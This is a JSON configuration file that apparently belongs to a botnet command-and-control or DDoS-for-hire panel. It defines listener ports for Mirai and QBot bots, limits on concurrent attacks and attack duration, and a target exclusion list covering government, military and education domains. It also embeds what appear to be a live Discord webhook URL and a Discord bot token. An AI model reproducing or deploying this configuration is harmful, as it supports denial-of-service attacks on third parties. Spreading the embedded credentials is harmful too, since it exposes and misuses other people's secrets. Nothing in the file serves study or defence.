{
	"MaxCons": 2,
	"TimeLimit": 300,
	"Discord": [
		"https://discord.com/api/webhooks/1059501956332269668/RBOacGR835mF98GOuNnkzUQCutukWpr_Fy8cvVkvbYjuBDD04F3wS2U0gSbsNWSFdzZ3"
	],
	"Telegram": [],
	"Bot": "MTA0NTM5MTMzODQ2NTY3MzI4Nw.GczNEF.1jifM4iizI3SctILLmvZQIUwFSDZl8K_22NkVA",
	"Prefix": "\u0026",
	"Screen": false,
	"Blacklist": [
		"1.1.1.1",
		"*.gov",
		"*.fbi",
		"*.nsa",
		"*.edu",
		"*.mil",
		"70.70.70.70"
	],
	"Whitelist": [],
	"Powersaving": true,
	"QBot": {
		"Host": "0.0.0.0",
		"Port": 2020,
		"Dupes": true
	},
	"Mirai": {
		"Host": "0.0.0.0",
		"Port": 5555,
		"Dupes": true
	}
}